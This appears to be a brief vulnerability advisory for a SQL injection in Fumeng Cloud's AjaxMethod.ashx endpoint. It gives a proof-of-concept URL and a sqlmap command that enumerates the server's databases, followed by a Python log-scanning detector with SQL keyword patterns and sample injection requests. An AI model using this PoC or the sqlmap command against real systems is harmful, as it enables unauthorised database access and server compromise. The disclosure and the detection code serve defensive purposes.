Fumeng Cloud AjaxMethod.ashx SQL injection vulnerability
Vulnerability Description
The AjaxMethod.ashx file in Fumeng Cloud has a SQL injection vulnerability, which an attacker can use to obtain server permissions.
Vulnerability Impact
Fumeng Cloud
Network surveying and mapping
Vulnerability Reproduction
Login page
Verify POC
https://xxx.xxx.xxx.xxx/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y%27
Using Sqlmap
sqlmap -u "https://xxx.xxx.xxx.xxx/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y" -p Name --batch --random-agent --dbms mssql --dbs
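A detection sketch for the requests shown above, as an added example that is not part of the original post: it scans web access logs for getEmpByname requests whose Name value carries SQL syntax. Because the sqlmap command above uses --random-agent, it matches on the decoded parameter rather than the User-Agent. The combined log format, the keyword list and the sample log lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint, action and parameter names come from the PoC URL on this page.
TARGET_PATH = "/ajax/ajaxmethod.ashx"
# Assumed rule set: syntax an employee-name lookup should not contain.
# A bare apostrophe also occurs in real names, so triage hits with the status code.
SUSPICIOUS = re.compile(
    r"['\";]|--|/\*|\b(union|select|waitfor|exec|declare|cast|convert)\b",
    re.IGNORECASE,
)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

SAMPLE_LOG = [  # constructed lines, combined log format, documentation IP ranges
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y%27 HTTP/1.1" 500 1208 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Yang HTTP/1.1" 200 311 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /ajax/ajaxmethod.ashx?ACTION=GetEmpByName&name=Y%20UNION%20SELECT%20NULL-- HTTP/1.1" 200 311 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [01/Jan/2024:10:02:00 +0000] "GET /Ajax/AjaxMethod.ashx?action=getDept&Name=O%27Brien HTTP/1.1" 200 90 "-" "Mozilla/5.0"',
]


def suspicious_name(target):
    """Return the decoded Name value if a getEmpByname request carries SQL syntax, else None."""
    parts = urlsplit(target)
    if parts.path.lower() != TARGET_PATH:
        return None
    # ASP.NET reads query keys case-insensitively, so normalise them first.
    params = {k.lower(): v for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    if "getempbyname" not in [a.lower() for a in params.get("action", [])]:
        return None
    for value in params.get("name", []):  # parse_qs has already percent-decoded the value
        if SUSPICIOUS.search(value):
            return value
    return None


def scan(lines):
    """Yield (client_ip, decoded_name) for each log line that matches."""
    for line in lines:
        m = REQUEST.search(line)
        if m and (hit := suspicious_name(m.group(1))) is not None:
            yield line.split(" ", 1)[0], hit


if __name__ == "__main__":
    for ip, name in scan(SAMPLE_LOG):
        print(ip, repr(name))
```

Only the query string is inspected, so requests that send Name in a POST body need request-body logging or a WAF rule to be visible.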
This post is licensed under CC BY 4.0 by the author.